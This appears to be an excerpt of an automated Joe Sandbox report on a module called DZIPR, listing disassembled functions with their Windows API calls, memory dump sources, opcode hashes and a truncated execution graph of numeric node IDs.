                          • __CxxThrowException@8.LIBCMT ref: 6FA66AC0
                          • FormatMessageW.KERNEL32(00001100,00000000,6FA8C050,00000800,000000FF,00000000,00000000,?,?,6FA8D898,00000004,6FA616A6,?,6FA6155A,8007000E,6FA613DE), ref: 6FA66AEA
                          • LocalFree.KERNEL32(000000FF,000000FF,6FA6279F), ref: 6FA66B12
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2747606978.000000006FA61000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA60000, based on PE: true
                          • Associated: 0000000F.00000002.2747589985.000000006FA60000.00000002.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747699931.000000006FA88000.00000002.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747733204.000000006FA91000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747733204.000000006FA95000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747773065.000000006FA99000.00000002.00000001.01000000.00000007.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_6fa60000_DZIPR.jbxd
                          Similarity
                          • API ID: Exception@8FormatFreeH_prolog3LocalMessageThrow_malloc
                          • String ID:
                          • API String ID: 1776251131-0
                          • Opcode ID: e3fbd4b0989cb70ce308340e4c2ec83af6e9bf0190b53497d138ba4be86a4899
                          • Instruction ID: cc894b16765116089e881b441e46e150615fb489fae3a1244a4dcf07ddc0a3f9
                          • Opcode Fuzzy Hash: e3fbd4b0989cb70ce308340e4c2ec83af6e9bf0190b53497d138ba4be86a4899
                          • Instruction Fuzzy Hash: FC118C71610309AFEF048F68CC40EA93BB5FF4A710F24C529B5288E3D0EB7599908B50
                          APIs
                          • RegSetValueExW.ADVAPI32(00000000,?,00000000,00000004,?,00000004), ref: 6FA6D194
                          • RegCloseKey.ADVAPI32(00000000), ref: 6FA6D19D
                          • swprintf.LIBCMT ref: 6FA6D1BA
                          • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 6FA6D1CB
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2747606978.000000006FA61000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA60000, based on PE: true
                          • Associated: 0000000F.00000002.2747589985.000000006FA60000.00000002.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747699931.000000006FA88000.00000002.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747733204.000000006FA91000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747733204.000000006FA95000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747773065.000000006FA99000.00000002.00000001.01000000.00000007.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_6fa60000_DZIPR.jbxd
                          Similarity
                          • API ID: ClosePrivateProfileStringValueWriteswprintf
                          • String ID:
                          • API String ID: 22681860-0
                          • Opcode ID: 535d7f54b9e7a46fafe4eaa8ed534b3fc4e032860baae44ab461113881b4f21c
                          • Instruction ID: 08d1978a63bbf41bb34066f69ae49586d98d70a0a78cd788d7369aedc74e2383
                          • Opcode Fuzzy Hash: 535d7f54b9e7a46fafe4eaa8ed534b3fc4e032860baae44ab461113881b4f21c
                          • Instruction Fuzzy Hash: ED01E132500309ABDB109B248C45FAF77ACAF4A754F140419F911A7180DFB8E951C7A0
                          APIs
                            • Part of subcall function 6FA668E2: _malloc.LIBCMT ref: 6FA66900
                          • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 6FA672BB
                          • GetCurrentProcess.KERNEL32(?,00000000), ref: 6FA672C1
                          • DuplicateHandle.KERNEL32(00000000), ref: 6FA672C4
                          • GetLastError.KERNEL32(?), ref: 6FA672DF
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2747606978.000000006FA61000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA60000, based on PE: true
                          • Associated: 0000000F.00000002.2747589985.000000006FA60000.00000002.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747699931.000000006FA88000.00000002.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747733204.000000006FA91000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747733204.000000006FA95000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747773065.000000006FA99000.00000002.00000001.01000000.00000007.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_6fa60000_DZIPR.jbxd
                          Similarity
                          • API ID: CurrentProcess$DuplicateErrorHandleLast_malloc
                          • String ID:
                          • API String ID: 3704204646-0
                          • Opcode ID: ad2915563bab32f7727b9d7c947e5c20fe22912c01763d8be242f73a36aa9896
                          • Instruction ID: c305183b469546a3d34e5618bc3e2b36ba15facb21756281a77dbd916872f2dd
                          • Opcode Fuzzy Hash: ad2915563bab32f7727b9d7c947e5c20fe22912c01763d8be242f73a36aa9896
                          • Instruction Fuzzy Hash: F301D431600701ABDB009BB5CD88F9A7BA9EF85724F148411F514CB280EFB4EC418760
                          APIs
                          • GetTopWindow.USER32(?), ref: 6FA70F9D
                          • GetTopWindow.USER32(00000000), ref: 6FA70FDC
                          • GetWindow.USER32(00000000,00000002), ref: 6FA70FFA
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2747606978.000000006FA61000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA60000, based on PE: true
                          • Associated: 0000000F.00000002.2747589985.000000006FA60000.00000002.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747699931.000000006FA88000.00000002.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747733204.000000006FA91000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747733204.000000006FA95000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747773065.000000006FA99000.00000002.00000001.01000000.00000007.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_6fa60000_DZIPR.jbxd
                          Similarity
                          • API ID: Window
                          • String ID:
                          • API String ID: 2353593579-0
                          • Opcode ID: 9b6066ad5e9ffcccdb38d7f67479426e39654eb2b43ac251e494942fe0c07083
                          • Instruction ID: 9b9e324423414b8dcf45c75769bff71e85e5ccd62f1bf38b1d30bf3507121e8d
                          • Opcode Fuzzy Hash: 9b6066ad5e9ffcccdb38d7f67479426e39654eb2b43ac251e494942fe0c07083
                          • Instruction Fuzzy Hash: C101213604965ABBCF225F518D04EDF3F25EF45360F059011F92055150CF3AD5B2DBA1
                          APIs
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2747606978.000000006FA61000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA60000, based on PE: true
                          • Associated: 0000000F.00000002.2747589985.000000006FA60000.00000002.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747699931.000000006FA88000.00000002.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747733204.000000006FA91000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747733204.000000006FA95000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747773065.000000006FA99000.00000002.00000001.01000000.00000007.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_6fa60000_DZIPR.jbxd
                          Similarity
                          • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                          • String ID:
                          • API String ID: 3016257755-0
                          • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                          • Instruction ID: 0f6f1f4e7876a1d9d2d180f6bb8be1b1fc9b9545ff4f616325c843e0f11180f6
                          • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                          • Instruction Fuzzy Hash: F911807A40028EBBCF225F84CD91CDE3F66BB19354B088415FA2858170DB3AD6B1AB81
                          APIs
                          • GetDlgItem.USER32(?,?), ref: 6FA703DC
                          • GetTopWindow.USER32(00000000), ref: 6FA703EF
                            • Part of subcall function 6FA703CF: GetWindow.USER32(00000000,00000002), ref: 6FA70436
                          • GetTopWindow.USER32(?), ref: 6FA7041F
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2747606978.000000006FA61000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA60000, based on PE: true
                          • Associated: 0000000F.00000002.2747589985.000000006FA60000.00000002.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747699931.000000006FA88000.00000002.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747733204.000000006FA91000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747733204.000000006FA95000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747773065.000000006FA99000.00000002.00000001.01000000.00000007.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_6fa60000_DZIPR.jbxd
                          Similarity
                          • API ID: Window$Item
                          • String ID:
                          • API String ID: 369458955-0
                          • Opcode ID: 6319793de4d0be61dab834bbd9c6db2242885ecf5d282f74fd3287991228ecc1
                          • Instruction ID: 2cbe93f9282fc28b807cb212c35305a10604d9195fbe01762011eda81b4e5cf0
                          • Opcode Fuzzy Hash: 6319793de4d0be61dab834bbd9c6db2242885ecf5d282f74fd3287991228ecc1
                          • Instruction Fuzzy Hash: B201D43A045A1A6B8B322F228D04ECF3B29AF423A0F05E021FD2495141EF3BD5929695
                          APIs
                          • __getptd.LIBCMT ref: 6FA80586
                            • Part of subcall function 6FA7A27F: __getptd_noexit.LIBCMT ref: 6FA7A282
                            • Part of subcall function 6FA7A27F: __amsg_exit.LIBCMT ref: 6FA7A28F
                          • __getptd.LIBCMT ref: 6FA8059D
                          • __amsg_exit.LIBCMT ref: 6FA805AB
                          • __lock.LIBCMT ref: 6FA805BB
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2747606978.000000006FA61000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA60000, based on PE: true
                          • Associated: 0000000F.00000002.2747589985.000000006FA60000.00000002.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747699931.000000006FA88000.00000002.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747733204.000000006FA91000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747733204.000000006FA95000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747773065.000000006FA99000.00000002.00000001.01000000.00000007.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_6fa60000_DZIPR.jbxd
                          Similarity
                          • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                          • String ID:
                          • API String ID: 3521780317-0
                          • Opcode ID: 5d14fe69f2a1c427e5b14fd869aa313619f179635f5b185cbc8a7995a243bfe5
                          • Instruction ID: d0bf8809a8a2cc7de514b46fc279f756234bd01e820d88a053294ae0c5f1fca0
                          • Opcode Fuzzy Hash: 5d14fe69f2a1c427e5b14fd869aa313619f179635f5b185cbc8a7995a243bfe5
                          • Instruction Fuzzy Hash: DEF09076912710DFDB34ABB8C601B4D33A56F00728F45D55AD4A0A72E0DFBCA5C2CBA1
                          APIs
                            • Part of subcall function 6FA6A59C: GetModuleHandleW.KERNEL32(KERNEL32,6FA6A6B6), ref: 6FA6A5AA
                            • Part of subcall function 6FA6A59C: GetProcAddress.KERNEL32(00000000,CreateActCtxW), ref: 6FA6A5CB
                            • Part of subcall function 6FA6A59C: GetProcAddress.KERNEL32(ReleaseActCtx), ref: 6FA6A5DD
                            • Part of subcall function 6FA6A59C: GetProcAddress.KERNEL32(ActivateActCtx), ref: 6FA6A5EF
                            • Part of subcall function 6FA6A59C: GetProcAddress.KERNEL32(DeactivateActCtx), ref: 6FA6A601
                          • GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 6FA6A6D0
                          • SetLastError.KERNEL32(0000006F), ref: 6FA6A6E7
                          Strings
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2747606978.000000006FA61000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA60000, based on PE: true
                          • Associated: 0000000F.00000002.2747589985.000000006FA60000.00000002.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747699931.000000006FA88000.00000002.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747733204.000000006FA91000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747733204.000000006FA95000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747773065.000000006FA99000.00000002.00000001.01000000.00000007.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_6fa60000_DZIPR.jbxd
                          Similarity
                          • API ID: AddressProc$Module$ErrorFileHandleLastName
                          • String ID:
                          • API String ID: 2524245154-3916222277
                          • Opcode ID: 9b7202bf5612ffb8e11c4989044f1aeb64deeb8fb95b44af71d819324653681b
                          • Instruction ID: b1d80ec08e32fc2e326ad18c9eb92f0a53e63d5e9fa8ebd184d4ef84585b3b31
                          • Opcode Fuzzy Hash: 9b7202bf5612ffb8e11c4989044f1aeb64deeb8fb95b44af71d819324653681b
                          • Instruction Fuzzy Hash: 4B213A709107289ADB20DF74C9587DAB7B9BF05324F1086A9D069D6180DB786BC5CF50
                          APIs
                          • GetModuleFileNameW.KERNEL32(?,?,00000104), ref: 6FA68E78
                          • PathFindExtensionW.SHLWAPI(?), ref: 6FA68E8E
                            • Part of subcall function 6FA68BDF: __EH_prolog3_GS.LIBCMT ref: 6FA68BE9
                            • Part of subcall function 6FA68BDF: GetModuleHandleW.KERNEL32(kernel32.dll,00000260,6FA68EB7,?,?), ref: 6FA68C19
                            • Part of subcall function 6FA68BDF: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 6FA68C2D
                            • Part of subcall function 6FA68BDF: ConvertDefaultLocale.KERNEL32(?), ref: 6FA68C69
                            • Part of subcall function 6FA68BDF: ConvertDefaultLocale.KERNEL32(?), ref: 6FA68C77
                            • Part of subcall function 6FA68BDF: GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 6FA68C94
                            • Part of subcall function 6FA68BDF: ConvertDefaultLocale.KERNEL32(?), ref: 6FA68CBF
                            • Part of subcall function 6FA68BDF: ConvertDefaultLocale.KERNEL32(000003FF), ref: 6FA68CC8
                            • Part of subcall function 6FA68BDF: GetModuleFileNameW.KERNEL32(6FA60000,?,00000105), ref: 6FA68D7F
                          Strings
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2747606978.000000006FA61000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA60000, based on PE: true
                          • Associated: 0000000F.00000002.2747589985.000000006FA60000.00000002.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747699931.000000006FA88000.00000002.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747733204.000000006FA91000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747733204.000000006FA95000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747773065.000000006FA99000.00000002.00000001.01000000.00000007.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_6fa60000_DZIPR.jbxd
                          Similarity
                          • API ID: ConvertDefaultLocale$Module$AddressFileNameProc$ExtensionFindH_prolog3_HandlePath
                          • String ID: %s%s.dll
                          • API String ID: 1311856149-1649984862
                          • Opcode ID: 1eef273f7aa224758605b084f8e5473b01c7540e364c50a1cb45483cd0144ff1
                          • Instruction ID: 3d0a5f4eea6916425da8f23c3ca14eb237912da21d9794a35aee828632867211
                          • Opcode Fuzzy Hash: 1eef273f7aa224758605b084f8e5473b01c7540e364c50a1cb45483cd0144ff1
                          • Instruction Fuzzy Hash: 3101A2B1A19618ABCB11DB68DD85DEFB7BDAF4A310F0100A9A405E7140EEB4DA458B90
                          APIs
                            • Part of subcall function 6FA75017: __getptd.LIBCMT ref: 6FA7501D
                            • Part of subcall function 6FA75017: __getptd.LIBCMT ref: 6FA7502D
                          • __getptd.LIBCMT ref: 6FA7C54B
                            • Part of subcall function 6FA7A27F: __getptd_noexit.LIBCMT ref: 6FA7A282
                            • Part of subcall function 6FA7A27F: __amsg_exit.LIBCMT ref: 6FA7A28F
                          • __getptd.LIBCMT ref: 6FA7C559
                          Strings
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2747606978.000000006FA61000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA60000, based on PE: true
                          • Associated: 0000000F.00000002.2747589985.000000006FA60000.00000002.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747699931.000000006FA88000.00000002.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747733204.000000006FA91000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747733204.000000006FA95000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747773065.000000006FA99000.00000002.00000001.01000000.00000007.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_6fa60000_DZIPR.jbxd
                          Similarity
                          • API ID: __getptd$__amsg_exit__getptd_noexit
                          • String ID: csm
                          • API String ID: 803148776-1018135373
                          • Opcode ID: f8cc2f09cc03d4c7c6e467d980a2c87cccd186c913e22614bc70be444f49effe
                          • Instruction ID: d2186df3325105b6d839a5290713680d7d9bd9099326282462a1afe2a1c17dca
                          • Opcode Fuzzy Hash: f8cc2f09cc03d4c7c6e467d980a2c87cccd186c913e22614bc70be444f49effe
                          • Instruction Fuzzy Hash: 800128798443059ACF349F60C540E9EBBBAAF10211F58442AD8509A6A1DF3AAAC0DF51
                          APIs
                          • EnterCriticalSection.KERNEL32(?), ref: 6FA6BFBC
                          • LeaveCriticalSection.KERNEL32(?), ref: 6FA6BFCC
                          • LocalFree.KERNEL32(?), ref: 6FA6BFD5
                          • TlsSetValue.KERNEL32(?,00000000), ref: 6FA6BFE7
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2747606978.000000006FA61000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA60000, based on PE: true
                          • Associated: 0000000F.00000002.2747589985.000000006FA60000.00000002.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747699931.000000006FA88000.00000002.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747733204.000000006FA91000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747733204.000000006FA95000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747773065.000000006FA99000.00000002.00000001.01000000.00000007.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_6fa60000_DZIPR.jbxd
                          Similarity
                          • API ID: CriticalSection$EnterFreeLeaveLocalValue
                          • String ID:
                          • API String ID: 2949335588-0
                          • Opcode ID: e1ab9c12afd2652b23634e2d38a671145a352cb4a81b46cb5f7680dc697bd909
                          • Instruction ID: dd81c5bcc928b524b0c9510a117ef0a7d41cfc0589859dc9fb2695a7db9e3e38
                          • Opcode Fuzzy Hash: e1ab9c12afd2652b23634e2d38a671145a352cb4a81b46cb5f7680dc697bd909
                          • Instruction Fuzzy Hash: 1C114431600704EFD714CF54C884B9AB7A4FF46366F10852AF2628B6A1CBB5E891CF20
                          APIs
                          • EnterCriticalSection.KERNEL32(6FA934A8,?,?,?,?,6FA6BB27,00000010,00000008,6FA6AF1F,6FA6AEC2,6FA66DDD,6FA6A591,6FA62BC2,?,?,?), ref: 6FA6C25A
                          • InitializeCriticalSection.KERNEL32(-000071A8,?,?,?,6FA6BB27,00000010,00000008,6FA6AF1F,6FA6AEC2,6FA66DDD,6FA6A591,6FA62BC2,?,?,?,?), ref: 6FA6C26C
                          • LeaveCriticalSection.KERNEL32(6FA934A8,?,?,?,6FA6BB27,00000010,00000008,6FA6AF1F,6FA6AEC2,6FA66DDD,6FA6A591,6FA62BC2,?,?,?,?), ref: 6FA6C279
                          • EnterCriticalSection.KERNEL32(-000071A8,?,?,?,?,6FA6BB27,00000010,00000008,6FA6AF1F,6FA6AEC2,6FA66DDD,6FA6A591,6FA62BC2,?,?,?), ref: 6FA6C289
                            • Part of subcall function 6FA66DC1: __CxxThrowException@8.LIBCMT ref: 6FA66DD7
                            • Part of subcall function 6FA66DC1: __EH_prolog3.LIBCMT ref: 6FA66DE4
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2747606978.000000006FA61000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA60000, based on PE: true
                          • Associated: 0000000F.00000002.2747589985.000000006FA60000.00000002.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747699931.000000006FA88000.00000002.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747733204.000000006FA91000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747733204.000000006FA95000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747773065.000000006FA99000.00000002.00000001.01000000.00000007.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_6fa60000_DZIPR.jbxd
                          Similarity
                          • API ID: CriticalSection$Enter$Exception@8H_prolog3InitializeLeaveThrow
                          • String ID:
                          • API String ID: 2895727460-0
                          • Opcode ID: 39bfd20c036b96ab9fb31524fc02e966672b3e49fcc4bb7768d52ac27b4a6eb4
                          • Instruction ID: 7fdfdb8ef49278db9efc6b6f80dd8fe2e66216e1a6f94fca5adcc388983f782f
                          • Opcode Fuzzy Hash: 39bfd20c036b96ab9fb31524fc02e966672b3e49fcc4bb7768d52ac27b4a6eb4
                          • Instruction Fuzzy Hash: 02F06872504314AFDE005AA8DC86705BB7DEFD336AF554026E69C86241CF7894D1C771
                          APIs
                          • EnterCriticalSection.KERNEL32(6FA932EC,?,?,?,?,6FA6C0B7,?,00000004,6FA6AF00,6FA66DDD,6FA6A591,6FA62BC2,?,?,?,?), ref: 6FA6BA69
                          • TlsGetValue.KERNEL32(6FA932D0,?,?,?,6FA6C0B7,?,00000004,6FA6AF00,6FA66DDD,6FA6A591,6FA62BC2,?,?,?,?,?), ref: 6FA6BA7D
                          • LeaveCriticalSection.KERNEL32(6FA932EC,?,?,?,6FA6C0B7,?,00000004,6FA6AF00,6FA66DDD,6FA6A591,6FA62BC2,?,?,?,?,?), ref: 6FA6BA93
                          • LeaveCriticalSection.KERNEL32(6FA932EC,?,?,?,6FA6C0B7,?,00000004,6FA6AF00,6FA66DDD,6FA6A591,6FA62BC2,?,?,?,?,?), ref: 6FA6BA9E
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2747606978.000000006FA61000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA60000, based on PE: true
                          • Associated: 0000000F.00000002.2747589985.000000006FA60000.00000002.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747699931.000000006FA88000.00000002.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747733204.000000006FA91000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747733204.000000006FA95000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747773065.000000006FA99000.00000002.00000001.01000000.00000007.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_6fa60000_DZIPR.jbxd
                          Similarity
                          • API ID: CriticalSection$Leave$EnterValue
                          • String ID:
                          • API String ID: 3969253408-0
                          • Opcode ID: 1f1f3f574166a536b75dfca2cc775ea7941c148772b0150669d56eb8719d5241
                          • Instruction ID: 8529b0ed3ee62ab2c3fab050cd0cbd7c4f0f0d98b327ec894d1f3210515d40c9
                          • Opcode Fuzzy Hash: 1f1f3f574166a536b75dfca2cc775ea7941c148772b0150669d56eb8719d5241
                          • Instruction Fuzzy Hash: 83F0E9362647009FD7209F18CC88C0A7BBDEF863B03058515F65983200CE74F892CFA0

                          Execution Graph

                          Execution Coverage:3%
                          Dynamic/Decrypted Code Coverage:0%
                          Signature Coverage:0%
                          Total number of Nodes:1666
                          Total number of Limit Nodes:28
                          execution_graph 18485 6c5339b0 18486 6c5339ee 18485->18486 18519 6c531990 18486->18519 18488 6c533a0a 18525 6c532370 18488->18525 18490 6c533a69 18554 6c531a10 18490->18554 18492 6c533b12 18493 6c533b77 18492->18493 18494 6c533b16 18492->18494 18496 6c533b81 18493->18496 18497 6c533c3b 18493->18497 18529 6c531000 18494->18529 18589 6c533090 18496->18589 18621 6c532c10 18497->18621 18501 6c533b8c 18598 6c5331f0 18501->18598 18502 6c533c49 18631 6c5315f0 18502->18631 18510 6c533b4c ctype 18584 6c537202 18510->18584 18512 6c533b65 18640 6c535590 18512->18640 18520 6c5319b4 18519->18520 18656 6c5368e2 18520->18656 18523 6c5368e2 ctype 67 API calls 18524 6c5319e7 18523->18524 18524->18488 18526 6c53239f 18525->18526 19032 6c5314a0 18526->19032 18528 6c53240f 18528->18490 18530 6c53102d 18529->18530 18531 6c5331f0 102 API calls 18530->18531 18532 6c531068 18531->18532 18533 6c5315f0 67 API calls 18532->18533 18534 6c531077 18533->18534 18535 6c533e60 18534->18535 19068 6c543d6c 18535->19068 18537 6c534443 18538 6c5368e2 ctype 67 API calls 18537->18538 18540 6c534460 18538->18540 18539 6c533b35 18561 6c535070 18539->18561 19115 6c54527b 18540->19115 18542 6c5344ae 19118 6c536dc1 18542->19118 18545 6c5368e2 ctype 67 API calls 18550 6c533ea7 _memset 18545->18550 18549 6c53afc3 69 API calls 18549->18550 18550->18537 18550->18539 18550->18542 18550->18545 18550->18549 18553 6c5340fd 18550->18553 19078 6c535ca0 18550->19078 19091 6c536160 18550->19091 19096 6c53b1ec 18550->19096 18552 6c536750 ReadFile 18552->18553 18553->18550 18553->18552 19102 6c535e70 18553->19102 19108 6c5363f0 18553->19108 19151 6c53764f 18554->19151 18556 6c531af7 18556->18492 18557 6c531a59 18557->18556 19166 6c5372fd 18557->19166 18559 6c531ab1 GetDiskFreeSpaceW 18559->18556 18582 6c5350a6 18561->18582 18562 6c5353de 18563 6c536dc1 ctype 2 API calls 18562->18563 18564 6c5353e3 18563->18564 18567 6c5368e2 ctype 67 API calls 18564->18567 18565 6c53538f 18568 6c5368e2 ctype 67 API calls 18565->18568 18574 6c5353ea 18567->18574 18576 6c535396 18568->18576 18569 6c5352bf 19302 6c5347d0 18569->19302 18570 6c53525a 18570->18562 18570->18564 18570->18569 19298 6c5345f0 18570->19298 18575 6c54527b __CxxThrowException@8 RaiseException 18574->18575 18578 6c535432 18575->18578 18577 6c54527b __CxxThrowException@8 RaiseException 18576->18577 18577->18562 18579 6c53530c 18579->18510 18580 6c5331f0 102 API calls 18580->18582 18581 6c532600 101 API calls 18581->18582 18582->18562 18582->18565 18582->18570 18582->18580 18582->18581 19253 6c534880 18582->19253 19271 6c534ac0 18582->19271 19292 6c535490 18582->19292 18585 6c537212 CloseHandle 18584->18585 18586 6c537220 ctype 18584->18586 18585->18586 18587 6c537236 GetLastError 18586->18587 18588 6c537244 ctype 18586->18588 18587->18588 18588->18512 19525 6c532f60 18589->19525 18591 6c53309f 18592 6c5330a7 18591->18592 18593 6c5330bc 18591->18593 19539 6c533370 18592->19539 19547 6c531580 18593->19547 18596 6c5330b8 18596->18501 18597 6c5330c7 18597->18501 18599 6c533222 18598->18599 18600 6c53aef1 ctype 31 API calls 18599->18600 18601 6c533254 18600->18601 19556 6c5333f0 FindResourceExW 18601->19556 18603 6c533268 18604 6c53326c 18603->18604 18606 6c53aef1 ctype 31 API calls 18603->18606 18605 6c531580 67 API calls 18604->18605 18617 6c533279 18605->18617 18607 6c5332bf 18606->18607 18608 6c5333f0 71 API calls 18607->18608 18609 6c5332d3 18608->18609 18610 6c5332d7 18609->18610 18611 6c533308 18609->18611 18612 6c531580 67 API calls 18610->18612 18613 6c53a58c 31 API calls 18611->18613 18612->18617 18614 6c53330e 18613->18614 18614->18604 18615 6c533325 18614->18615 18616 6c532b50 98 API calls 18615->18616 18616->18617 18618 6c532600 18617->18618 19570 6c531240 18618->19570 18620 6c532613 18620->18512 18622 6c532c51 18621->18622 18623 6c5331f0 102 API calls 18622->18623 18629 6c532cc0 18622->18629 18625 6c532cad 18623->18625 18624 6c5331f0 102 API calls 18626 6c532cf9 18624->18626 18627 6c5444cb 67 API calls 18625->18627 18628 6c532600 101 API calls 18626->18628 18627->18629 18630 6c532d0b ctype 18628->18630 18629->18624 18630->18502 18632 6c531606 18631->18632 18633 6c53165a 18631->18633 18634 6c531646 18632->18634 18635 6c531616 18632->18635 18633->18512 18636 6c5314a0 67 API calls 18634->18636 18637 6c531580 67 API calls 18635->18637 18638 6c531652 18636->18638 18639 6c53161d 18637->18639 18638->18512 18639->18512 18641 6c5355bb 18640->18641 18645 6c533d8b 18640->18645 18642 6c5331f0 102 API calls 18641->18642 18641->18645 18643 6c5355d1 18642->18643 18644 6c532600 101 API calls 18643->18644 18644->18645 18646 6c532490 18645->18646 18647 